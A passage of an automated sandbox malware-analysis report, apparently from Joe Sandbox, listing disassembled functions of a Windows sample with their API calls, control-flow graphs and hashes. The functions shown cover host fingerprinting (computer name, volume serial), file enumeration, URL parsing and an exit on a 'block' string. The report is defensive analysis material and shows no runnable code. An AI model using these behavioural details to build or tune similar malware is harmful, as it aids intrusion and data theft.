                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrcatlstrlen$Process$EventExit$CloseHandleHeapOpenUser$AllocateCreateDefaultLangNameSleep
                              • String ID:
                              • API String ID: 4175272417-0
                              • Opcode ID: 20d34ce847fa9ad91b55344cae7587f1e25d580fc2f76e86e27e813444e34130
                              • Instruction ID: 30f7c21eaa31fb891afe84213bc16986b9a9a858ef6e899380ee9f1e763d663d
                              • Opcode Fuzzy Hash: 20d34ce847fa9ad91b55344cae7587f1e25d580fc2f76e86e27e813444e34130
                              • Instruction Fuzzy Hash: EE616031901606AFCBA1ABB0DC9DFAF7F79BF80741F548028F90596161EB38AC058769
                              Function 005B01D0 Relevance: 40.4, APIs: 25, Strings: 1, Instructions: 1433stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B022F
                              • lstrlen.KERNEL32(005BD014), ref: 005B0250
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0285
                              • lstrlen.KERNEL32(005BD014), ref: 005B0290
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B02C5
                              • lstrlen.KERNEL32(005BD014), ref: 005B02D0
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0305
                              • lstrlen.KERNEL32(005BD014), ref: 005B0321
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0356
                              • lstrlen.KERNEL32(005BD014), ref: 005B0361
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0393
                              • lstrlen.KERNEL32(005BD014), ref: 005B039E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B03CA
                              • lstrlen.KERNEL32(005BD014), ref: 005B03F5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0421
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: fplugins
                              • API String ID: 367037083-38756186
                              • Opcode ID: 7d76a6c321e2ad8b05748740b4a13d287f0c7a32828a8a8a950a4ebd44bc80e1
                              • Instruction ID: a10bb39d2401e10473c9423711cf8148cfd7940ca5877cb3b51851b11c33f705
                              • Opcode Fuzzy Hash: 7d76a6c321e2ad8b05748740b4a13d287f0c7a32828a8a8a950a4ebd44bc80e1
                              • Instruction Fuzzy Hash: 7ED26B70A012058FDB64DF29C899BA9BBF0BF48314F5981ADD40C9B2A2DB35ED85CF51
                              Function 005A8D00 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2250 5a8d00-5a8d24 StrCmpCA 2251 5a8d2d-5a8d46 2250->2251 2252 5a8d26-5a8d27 ExitProcess 2250->2252 2254 5a8d4c-5a8d51 2251->2254 2255 5a8f42-5a8f4f call 592930 2251->2255 2257 5a8d56-5a8d59 2254->2257 2259 5a8d5f 2257->2259 2260 5a8f23-5a8f3c 2257->2260 2261 5a8dba-5a8dc9 lstrlen 2259->2261 2262 5a8e1d-5a8e2b StrCmpCA 2259->2262 2263 5a8e3d-5a8e4b StrCmpCA 2259->2263 2264 5a8e5d-5a8e6b StrCmpCA 2259->2264 2265 5a8e7d-5a8e8b StrCmpCA 2259->2265 2266 5a8e9d-5a8eab StrCmpCA 2259->2266 2267 5a8d90-5a8d9f lstrlen 2259->2267 2268 5a8eb6-5a8ec4 StrCmpCA 2259->2268 2269 5a8ee8-5a8efa lstrlen 2259->2269 2270 5a8ecf-5a8edd StrCmpCA 2259->2270 2271 5a8d66-5a8d75 lstrlen 2259->2271 2272 5a8de4-5a8df2 StrCmpCA 2259->2272 2273 5a8e04-5a8e18 StrCmpCA 2259->2273 2260->2255 2299 5a8d53 2260->2299 2288 5a8dcb-5a8dd0 call 592930 2261->2288 2289 5a8dd3-5a8ddf call 592840 2261->2289 2262->2260 2275 5a8e31-5a8e38 2262->2275 2263->2260 2276 5a8e51-5a8e58 2263->2276 2264->2260 2277 5a8e71-5a8e78 2264->2277 2265->2260 2278 5a8e91-5a8e98 2265->2278 2266->2260 2279 5a8ead-5a8eb4 2266->2279 2286 5a8da9-5a8db5 call 592840 2267->2286 2287 5a8da1-5a8da6 call 592930 2267->2287 2268->2260 2282 5a8ec6-5a8ecd 2268->2282 2284 5a8efc-5a8f01 call 592930 2269->2284 2285 5a8f04-5a8f10 call 592840 2269->2285 2270->2260 2283 5a8edf-5a8ee6 2270->2283 2280 5a8d7f-5a8d8b call 592840 2271->2280 2281 5a8d77-5a8d7c call 592930 2271->2281 2272->2260 2274 5a8df8-5a8dff 2272->2274 2273->2260 2274->2260 2275->2260 2276->2260 2277->2260 2278->2260 2279->2260 2308 5a8f13-5a8f15 2280->2308 2281->2280 2282->2260 2283->2260 2284->2285 2285->2308 2286->2308 2287->2286 2288->2289 2289->2308 2299->2257 2308->2260 2309 5a8f17-5a8f19 2308->2309 2309->2260 2310 5a8f1b-5a8f1d lstrcpy 2309->2310 2310->2260
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: aecbcdd8d160b1b5a2e05a4b10b8a19278b6a00c03dfa5f96a72919c35e8a762
                              • Instruction ID: d933edc76ad27c603d78d74543ec73b98e7f359fde692f3d75b4bc8cdb58458d
                              • Opcode Fuzzy Hash: aecbcdd8d160b1b5a2e05a4b10b8a19278b6a00c03dfa5f96a72919c35e8a762
                              • Instruction Fuzzy Hash: 2F5149B1604702AFCB209FA5D888E7E7FF5FB46704B10882DE952D6660EB78E481CB51
                              Function 005B26E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2311 5b26e0-5b2723 GetWindowsDirectoryA 2312 5b272c-5b278a GetVolumeInformationA 2311->2312 2313 5b2725 2311->2313 2314 5b278c-5b2792 2312->2314 2313->2312 2315 5b27a9-5b27c0 GetProcessHeap RtlAllocateHeap 2314->2315 2316 5b2794-5b27a7 2314->2316 2317 5b27c2-5b27c4 2315->2317 2318 5b27c6-5b27e4 wsprintfA 2315->2318 2316->2314 2319 5b27fb-5b2812 call 5b7210 2317->2319 2318->2319
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 005B271B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005A9416,00000000,00000000,00000000,00000000), ref: 005B274C
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B27AF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B27B6
                              • wsprintfA.USER32 ref: 005B27DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: ce8876df83ffeef61e6e0458eefc475d7a6b47008f08af8fbf79e7696c64b116
                              • Instruction ID: 150003d2e19e9b4833cd088aeafbdcb63439cd19ff97c767b5d1b93b21f63c4d
                              • Opcode Fuzzy Hash: ce8876df83ffeef61e6e0458eefc475d7a6b47008f08af8fbf79e7696c64b116
                              • Instruction Fuzzy Hash: 4C316FB19082499BCB14CFB899899EFFFB8FF5C700F10416DE505E7650E6349A408BB5
                              Function 00594AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2322 594ae0-594aee 2323 594af0-594af5 2322->2323 2323->2323 2324 594af7-594b68 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 592930 2323->2324
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00594B17
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00594B21
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00594B2B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00594B3F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00594B47
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: e09828a60a640e22be71afd9b086ec9c22cbbc8b1ed242ef9b6d26c0e8dd47c9
                              • Instruction ID: 019530663ddfdb48b647b34f195affdeedfb9f3385906253bf9f5b5f51be1c39
                              • Opcode Fuzzy Hash: e09828a60a640e22be71afd9b086ec9c22cbbc8b1ed242ef9b6d26c0e8dd47c9
                              • Instruction Fuzzy Hash: A7012D71D00218ABDB40DFA8EC49B9EBBB8EB48320F00812AF954E7390DBB459058FD5
                              Function 005AEFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2327 5aefe0-5af005 call 592840 2330 5af019-5af01d call 596b80 2327->2330 2331 5af007-5af00f 2327->2331 2334 5af022-5af038 StrCmpCA 2330->2334 2331->2330 2332 5af011-5af013 lstrcpy 2331->2332 2332->2330 2335 5af03a-5af052 call 592930 call 592840 2334->2335 2336 5af061-5af068 call 592930 2334->2336 2346 5af054-5af05c 2335->2346 2347 5af095-5af0f0 call 592930 * 10 2335->2347 2341 5af070-5af078 2336->2341 2341->2341 2343 5af07a-5af087 call 592840 2341->2343 2343->2347 2352 5af089 2343->2352 2346->2347 2348 5af05e-5af05f 2346->2348 2351 5af08e-5af08f lstrcpy 2348->2351 2351->2347 2352->2351
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF013
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AF02E
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF08F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: c1f5bd996dcc5776456743d239a9d0ba0316ba3e76a3451b4cd95a67835459f6
                              • Instruction ID: 1a0431954e4be6ac57580b6b2f3d32bc40b36c1188bdc39983371ace8e98c417
                              • Opcode Fuzzy Hash: c1f5bd996dcc5776456743d239a9d0ba0316ba3e76a3451b4cd95a67835459f6
                              • Instruction Fuzzy Hash: 73211270621207AFCF24BFB9DC4EA9E3FA4FF45704F444524B849DB212EA34E8918790
                              Function 005A8CE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2408 5a8ce1-5a8d24 StrCmpCA 2410 5a8d2d-5a8d46 2408->2410 2411 5a8d26-5a8d27 ExitProcess 2408->2411 2413 5a8d4c-5a8d51 2410->2413 2414 5a8f42-5a8f4f call 592930 2410->2414 2416 5a8d56-5a8d59 2413->2416 2418 5a8d5f 2416->2418 2419 5a8f23-5a8f3c 2416->2419 2420 5a8dba-5a8dc9 lstrlen 2418->2420 2421 5a8e1d-5a8e2b StrCmpCA 2418->2421 2422 5a8e3d-5a8e4b StrCmpCA 2418->2422 2423 5a8e5d-5a8e6b StrCmpCA 2418->2423 2424 5a8e7d-5a8e8b StrCmpCA 2418->2424 2425 5a8e9d-5a8eab StrCmpCA 2418->2425 2426 5a8d90-5a8d9f lstrlen 2418->2426 2427 5a8eb6-5a8ec4 StrCmpCA 2418->2427 2428 5a8ee8-5a8efa lstrlen 2418->2428 2429 5a8ecf-5a8edd StrCmpCA 2418->2429 2430 5a8d66-5a8d75 lstrlen 2418->2430 2431 5a8de4-5a8df2 StrCmpCA 2418->2431 2432 5a8e04-5a8e18 StrCmpCA 2418->2432 2419->2414 2458 5a8d53 2419->2458 2447 5a8dcb-5a8dd0 call 592930 2420->2447 2448 5a8dd3-5a8ddf call 592840 2420->2448 2421->2419 2434 5a8e31-5a8e38 2421->2434 2422->2419 2435 5a8e51-5a8e58 2422->2435 2423->2419 2436 5a8e71-5a8e78 2423->2436 2424->2419 2437 5a8e91-5a8e98 2424->2437 2425->2419 2438 5a8ead-5a8eb4 2425->2438 2445 5a8da9-5a8db5 call 592840 2426->2445 2446 5a8da1-5a8da6 call 592930 2426->2446 2427->2419 2441 5a8ec6-5a8ecd 2427->2441 2443 5a8efc-5a8f01 call 592930 2428->2443 2444 5a8f04-5a8f10 call 592840 2428->2444 2429->2419 2442 5a8edf-5a8ee6 2429->2442 2439 5a8d7f-5a8d8b call 592840 2430->2439 2440 5a8d77-5a8d7c call 592930 2430->2440 2431->2419 2433 5a8df8-5a8dff 2431->2433 2432->2419 2433->2419 2434->2419 2435->2419 2436->2419 2437->2419 2438->2419 2467 5a8f13-5a8f15 2439->2467 2440->2439 2441->2419 2442->2419 2443->2444 2444->2467 2445->2467 2446->2445 2447->2448 2448->2467 2458->2416 2467->2419 2468 5a8f17-5a8f19 2467->2468 2468->2419 2469 5a8f1b-5a8f1d lstrcpy 2468->2469 2469->2419
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 8500e4325c0bde2a0846c6bed6f879fb701e3564d5eb8ce8c3f1a04bcadd8f60
                              • Instruction ID: 80c37ca3390054333e0e1c8b48ca64a5d2caa00cd2816a8c1194a5f286a88fe0
                              • Opcode Fuzzy Hash: 8500e4325c0bde2a0846c6bed6f879fb701e3564d5eb8ce8c3f1a04bcadd8f60
                              • Instruction Fuzzy Hash: 50E06D3450030BEBCB08DFA9D888C96FB28FF48740B04D75CE6094B562E774E880CBA9
                              Function 005B2A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2470 5b2a70-5b2ac2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2471 5b2ae4-5b2af9 2470->2471 2472 5b2ac4-5b2ad6 2470->2472
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A9F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2AA6
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 005B2ABA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 5bb6f1abec14a90f522337e06b54a72fef351a932dcb764469fe8dee20b57aa5
                              • Instruction ID: ed33e76786f4181c707f7150863228414db53e9ff8a13dfa3eb9f5d6fd1fc2cf
                              • Opcode Fuzzy Hash: 5bb6f1abec14a90f522337e06b54a72fef351a932dcb764469fe8dee20b57aa5
                              • Instruction Fuzzy Hash: C301D672A44608ABD710DF99EC49BAAFBBCF744B21F10426AFA15D3780D7785900C7A5

                              Non-executed Functions

                              Function 005A2730 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A2774
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2797
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A27A2
                              • lstrlen.KERNEL32(\*.*), ref: 005A27AD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A27CA
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A27D6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A280A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A2826
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
